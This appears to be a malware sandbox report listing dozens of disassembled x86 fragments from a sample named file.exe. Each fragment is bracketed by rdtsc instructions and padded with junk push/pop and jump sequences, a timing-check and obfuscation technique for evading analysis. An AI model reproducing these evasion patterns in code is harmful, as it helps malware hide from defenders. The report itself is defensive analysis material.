Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC900D second address: CC905A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2AC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jng 00007FE4211E2B08h 0x0000000f push ecx 0x00000010 jg 00007FE4211E2AB6h 0x00000016 push eax 0x00000017 pop eax 0x00000018 pop ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FE4211E2ABFh 0x00000020 jmp 00007FE4211E2AC4h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC905A second address: CC9077 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE420CEA019h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC921B second address: CC921F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC921F second address: CC922A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC922A second address: CC9230 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC9230 second address: CC9234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC9234 second address: CC926D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE4211E2AC7h 0x0000000b jnl 00007FE4211E2AC7h 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC9506 second address: CC9532 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE420CEA006h 0x00000008 jmp 00007FE420CEA018h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FE420CEA00Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC9532 second address: CC9538 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC9538 second address: CC9542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FE420CEA006h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC97DA second address: CC9801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE4211E2AC6h 0x00000009 popad 0x0000000a jno 00007FE4211E2AB8h 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC997C second address: CC9988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FE420CEA008h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC9988 second address: CC999B instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE4211E2ABEh 0x00000008 pushad 0x00000009 popad 0x0000000a jne 00007FE4211E2AB6h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCC74A second address: CCC753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCC753 second address: CCC757 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCC9A7 second address: CCC9AD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCC9AD second address: CCC9B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCC9B3 second address: CCC9C2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCCCC6 second address: CCCD64 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FE4211E2AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push esi 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pop esi 0x00000014 nop 0x00000015 call 00007FE4211E2AC3h 0x0000001a call 00007FE4211E2AC3h 0x0000001f cld 0x00000020 pop edx 0x00000021 pop edx 0x00000022 push dword ptr [ebp+122D2694h] 0x00000028 push 00000000h 0x0000002a push eax 0x0000002b call 00007FE4211E2AB8h 0x00000030 pop eax 0x00000031 mov dword ptr [esp+04h], eax 0x00000035 add dword ptr [esp+04h], 0000001Ah 0x0000003d inc eax 0x0000003e push eax 0x0000003f ret 0x00000040 pop eax 0x00000041 ret 0x00000042 ja 00007FE4211E2ABAh 0x00000048 sbb dx, EA42h 0x0000004d call 00007FE4211E2AB9h 0x00000052 jmp 00007FE4211E2AC5h 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a jnp 00007FE4211E2AB8h 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCCD64 second address: CCCD8E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE420CEA00Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007FE420CEA011h 0x00000012 mov eax, dword ptr [eax] 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCCD8E second address: CCCD92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5340BE9 second address: 5340C2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE420CEA011h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ah, bh 0x0000000f pushfd 0x00000010 jmp 00007FE420CEA014h 0x00000015 sbb esi, 6EA75DF8h 0x0000001b jmp 00007FE420CEA00Bh 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5340C2C second address: 5340C44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE4211E2AC4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5340C44 second address: 5340C48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5340C48 second address: 5340C88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov al, 04h 0x0000000c mov cl, bl 0x0000000e popad 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 mov dl, ah 0x00000013 jmp 00007FE4211E2AC3h 0x00000018 popad 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FE4211E2AC5h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5340C88 second address: 5340C98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE420CEA00Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380B12 second address: 5380B18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380B18 second address: 5380B29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE420CEA00Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380B29 second address: 5380B2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380B2D second address: 5380B3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380B3C second address: 5380B40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380B40 second address: 5380B44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380B44 second address: 5380B4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380B4A second address: 5380B50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380B50 second address: 5380B54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53409C7 second address: 53409F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 6E4737F8h 0x00000008 mov esi, ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edx 0x0000000e jmp 00007FE420CEA018h 0x00000013 mov dword ptr [esp], ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov cx, di 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53409F7 second address: 53409FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53409FD second address: 5340A01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5340A01 second address: 5340A05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5340A05 second address: 5340A27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE420CEA016h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5340A27 second address: 5340A2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5340A2D second address: 5340A31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5340A31 second address: 5340A61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov edi, esi 0x0000000e pushfd 0x0000000f jmp 00007FE4211E2ABEh 0x00000014 sub esi, 2D5D3648h 0x0000001a jmp 00007FE4211E2ABBh 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53405AA second address: 5340607 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 5611BF4Ah 0x00000008 mov ax, bx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 mov ecx, 0ABB2369h 0x00000015 call 00007FE420CEA016h 0x0000001a mov bx, si 0x0000001d pop esi 0x0000001e popad 0x0000001f xchg eax, ebp 0x00000020 pushad 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 pop ecx 0x00000025 mov esi, ebx 0x00000027 popad 0x00000028 mov ebp, esp 0x0000002a jmp 00007FE420CEA017h 0x0000002f pop ebp 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 mov dh, 83h 0x00000035 mov si, 9DE3h 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5340607 second address: 534060D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 534060D second address: 5340611 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53404B0 second address: 5340570 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2ABBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FE4211E2AC6h 0x0000000f push eax 0x00000010 pushad 0x00000011 call 00007FE4211E2AC1h 0x00000016 pushfd 0x00000017 jmp 00007FE4211E2AC0h 0x0000001c adc cl, 00000028h 0x0000001f jmp 00007FE4211E2ABBh 0x00000024 popfd 0x00000025 pop eax 0x00000026 mov edx, 42921F6Ch 0x0000002b popad 0x0000002c xchg eax, ebp 0x0000002d jmp 00007FE4211E2ABBh 0x00000032 mov ebp, esp 0x00000034 pushad 0x00000035 mov bx, si 0x00000038 pushfd 0x00000039 jmp 00007FE4211E2AC0h 0x0000003e add si, 50B8h 0x00000043 jmp 00007FE4211E2ABBh 0x00000048 popfd 0x00000049 popad 0x0000004a pop ebp 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e call 00007FE4211E2ABBh 0x00000053 pop ecx 0x00000054 call 00007FE4211E2AC9h 0x00000059 pop ecx 0x0000005a popad 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5340570 second address: 5340576 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5340576 second address: 534057A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53501E5 second address: 5350224 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE420CEA019h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FE420CEA011h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FE420CEA00Dh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5350224 second address: 5350256 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 mov ecx, edi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007FE4211E2AC5h 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FE4211E2ABDh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5350256 second address: 535025C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380A16 second address: 5380A1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380A1A second address: 5380A20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380A20 second address: 5380A9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, di 0x00000006 mov bl, AAh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FE4211E2AC4h 0x00000011 push eax 0x00000012 pushad 0x00000013 mov edx, 2394C5B4h 0x00000018 pushfd 0x00000019 jmp 00007FE4211E2ABDh 0x0000001e adc eax, 701F9976h 0x00000024 jmp 00007FE4211E2AC1h 0x00000029 popfd 0x0000002a popad 0x0000002b xchg eax, ebp 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007FE4211E2ABCh 0x00000033 xor si, 5698h 0x00000038 jmp 00007FE4211E2ABBh 0x0000003d popfd 0x0000003e push ecx 0x0000003f mov esi, edx 0x00000041 pop edi 0x00000042 popad 0x00000043 mov ebp, esp 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 mov eax, edx 0x0000004a pushad 0x0000004b popad 0x0000004c popad 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380A9D second address: 5380ACD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE420CEA012h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE420CEA017h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380ACD second address: 5380AE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE4211E2AC4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360247 second address: 5360257 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE420CEA00Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360257 second address: 5360292 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FE4211E2AC8h 0x00000012 adc eax, 385605B8h 0x00000018 jmp 00007FE4211E2ABBh 0x0000001d popfd 0x0000001e mov dx, cx 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360292 second address: 53602A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE420CEA010h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5340419 second address: 534041D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 534041D second address: 5340423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5340423 second address: 5340429 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5340429 second address: 534042D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 534042D second address: 5340431 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5340431 second address: 534043F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov al, bl 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 534043F second address: 5340487 instructions: 0x00000000 rdtsc 0x00000002 mov si, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FE4211E2AC5h 0x0000000e mov ebp, esp 0x00000010 jmp 00007FE4211E2ABEh 0x00000015 pop ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FE4211E2AC7h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5340487 second address: 534048C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5350D18 second address: 5350D1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5350D1C second address: 5350D22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5350D22 second address: 5350D61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 1D605B37h 0x00000008 pushfd 0x00000009 jmp 00007FE4211E2ABCh 0x0000000e xor ch, 00000028h 0x00000011 jmp 00007FE4211E2ABBh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FE4211E2AC5h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5350D61 second address: 5350D71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE420CEA00Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5350D71 second address: 5350DCF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2ABBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov di, 65DAh 0x00000011 push ebx 0x00000012 mov dx, si 0x00000015 pop ecx 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 mov dl, F9h 0x0000001b pushfd 0x0000001c jmp 00007FE4211E2AC0h 0x00000021 adc esi, 7C091348h 0x00000027 jmp 00007FE4211E2ABBh 0x0000002c popfd 0x0000002d popad 0x0000002e mov ebp, esp 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FE4211E2AC5h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5350DCF second address: 5350DD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5350DD5 second address: 5350DD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380035 second address: 5380084 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FE420CEA00Bh 0x00000008 xor cx, 712Eh 0x0000000d jmp 00007FE420CEA019h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov ebx, eax 0x00000017 popad 0x00000018 mov ebp, esp 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FE420CEA019h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380084 second address: 53800EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2AC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a jmp 00007FE4211E2ABEh 0x0000000f push eax 0x00000010 pushad 0x00000011 push edi 0x00000012 jmp 00007FE4211E2ABCh 0x00000017 pop eax 0x00000018 mov cx, bx 0x0000001b popad 0x0000001c xchg eax, ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov cx, F875h 0x00000024 pushfd 0x00000025 jmp 00007FE4211E2AC2h 0x0000002a add esi, 3249FDC8h 0x00000030 jmp 00007FE4211E2ABBh 0x00000035 popfd 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53800EA second address: 5380115 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 mov dx, 5436h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [76FB65FCh] 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FE420CEA018h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380115 second address: 538011B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 538011B second address: 538011F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 538011F second address: 5380123 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380123 second address: 5380143 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test eax, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE420CEA014h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380143 second address: 53801E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2ABBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FE492D962CAh 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FE4211E2AC4h 0x00000016 jmp 00007FE4211E2AC5h 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007FE4211E2AC0h 0x00000022 jmp 00007FE4211E2AC5h 0x00000027 popfd 0x00000028 popad 0x00000029 mov ecx, eax 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e pushfd 0x0000002f jmp 00007FE4211E2AC3h 0x00000034 adc ecx, 51F4A6EEh 0x0000003a jmp 00007FE4211E2AC9h 0x0000003f popfd 0x00000040 mov ch, 72h 0x00000042 popad 0x00000043 rdtsc
